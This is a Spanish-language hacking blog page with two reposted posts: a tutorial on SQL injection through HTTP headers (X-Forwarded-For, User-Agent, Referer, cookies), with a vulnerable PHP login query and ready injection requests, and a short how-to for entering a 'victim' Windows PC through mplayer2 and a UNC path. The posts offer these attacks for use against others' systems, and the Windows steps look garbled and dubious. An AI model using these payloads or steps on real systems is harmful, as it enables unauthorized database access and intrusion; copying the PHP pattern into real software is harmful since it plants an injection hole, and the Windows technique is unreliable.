Banner 1

Mostrando entradas con la etiqueta explotar. Mostrar todas las entradas
Mostrando entradas con la etiqueta explotar. Mostrar todas las entradas

SQL Inyection a travez de cabeceras HTTP

0 comentarios
Cuando realizamos pruebas de variables en una aplicacion web en busca de vulnerabilidades del tipo SQLI o Blind SQLI nos limitamos a testearla solo mediante peticiones GET y POST pero nos olvidamos o desconocemos de otros parametros que pueden ser inyectados para obtener un lindo error de la DB que nos permita meterle jeringa hasta sacarle jugo a  toda la informacion posible.

¿Y los parametros de una cabecera HTTP? ¿no son inyectables?
Este es un analisis que se realizo usando varios scaneres de aplicaciones web de codigo abierto y comerciales, como se puede distinguir, el 75%  de estas herramientas no pudo encontrar una vulnerabilidad en los encabezados HTTP, por otro lado el 70% de estos scaneres no inspecciona las cookies. Generalmente y si no me queda mas que indagar en las cabeceras trato de buscar este tipo de vulns a mano limpia, como deberia hacerse con todo :)
Posibles encabezados HTTP para inyecciones SQL
Los campos de la cabecera HTTP

 X-Forwarded-For

X-Forwarded-For es un campo de encabezado HTTP para la identificación de la dirección IP de origen de un cliente que se conecta a un servidor web a través de un proxy HTTP o un equilibrador de carga.
Vamos a ver un ejemplo de esta falla
$req = mysql_query("SELECT user,password FROM admins WHERE user='".sanitize($_POST['user'])."' AND password='".md5($_POST['password'])."' AND ip_adr='".ip_adr()."'");
 
La variable login es controlada por la funcion sanitize()
function sanitize($param){ if (is_numeric($param)) { return $param; } else { return mysql_real_escape_string($param); } }
Vamos a inspeccionar la variable ip controlada por la funcion ip_addr()
function ip_adr() { if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip_adr = $_SERVER['HTTP_X_FORWARDED_FOR']; } else { $ip_adr = $_SERVER["REMOTE_ADDR"]; } if (preg_match("#^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#",$ip_addr)) { return $ip_adr; } else { return $_SERVER["REMOTE_ADDR"]; }
 
Obviamente, la dirección IP se obtiene del parametro X_FORWARDED_FOR. Luego es controlado por preg_match que verifica si el valor corresponde a una dirección IP
la variable HTTP_X_FORWARDED_FOR  no es verificada apropiadamente antes de su valor que se utiliza en la consulta SQL. Esto puede llevar a ejecutar cualquier consulta SQL mediante la inyección de código SQL arbitrario en este campo.
La simple modificación de este campo de encabezado a algo así como :}
GET /index.php HTTP/1.1
X_FORWARDED_FOR :127.0.0.1' or 1=1#

User-Agent

Tambien podemos hacer uso de este parametro para verificar
GET /index.php HTTP/1.1
User-Agent: aaa' or 1/*
 

Referer

GET /index.php HTTP/1.1
Host: [host]
User-Agent: aaa' or 1/*
Referer: http://underterminal.nixiweb.com
 

Cookie

Podemos testear el parametro cookie manualmente complementando algun addon en el navegador que nos permita hacer esto, como Cookies Manager+ o el Tamper Data, asi inyectamos una sqli en el campo content.




O usando alguna herramienta de automatizacion como Sqlmap


Espero que les haya servido muchachos! saludos!

Fuente:http://underterminal.nixiweb.com

una sesión nula (mplayer2)

0 comentarios

Aquí les vamos a demostrar uno de los bugs de Windows, una forma de explotar su seguridad.

Bueno lo primero que debemos de saber es algún puerto abierto en el equipo que deseamos entrar, debemos escanear la IP en busca de un puerto abierto para facilitar el acceso, o si lo prefieres puedes probar sin necesidad de escanear nada, y pues hay posibilidad de que lo logres ya que esta técnica es demasiado infantil pero aquí vas ;)

Pones en el mplayer2: “mms://IP_VICTIMA:PUERTO_ABIERTO”

Yo tengo preferencia por el 1025 (Messenger), el 3389 (Remote Host) y cualquier otro que te permita tener abierta la conexion con el PC el tiempo suficiente.

Ejecutas en Inicio “\\IP_VICTIMA PUERTO_ABIERTO”

Si la cosa va bien entras en todo el PC si es un w9x. Si es un XP dependiendo del puerto que pongas acabaras en Documentos C o en otras carpetas compartidas que directamente no se accede.

Que fácil no? jejeje bueno ahora ya queda poner de tu parte y recuerda que la bace para hackear esta en tu imaginacion ;)


Fuente: http://www.blogdelhacker.com/2007/02/15/entrnado-en-secion-nula-por-mplayer2-hackeando-windows/

Powered by Bad Robot
Helped by Blackubay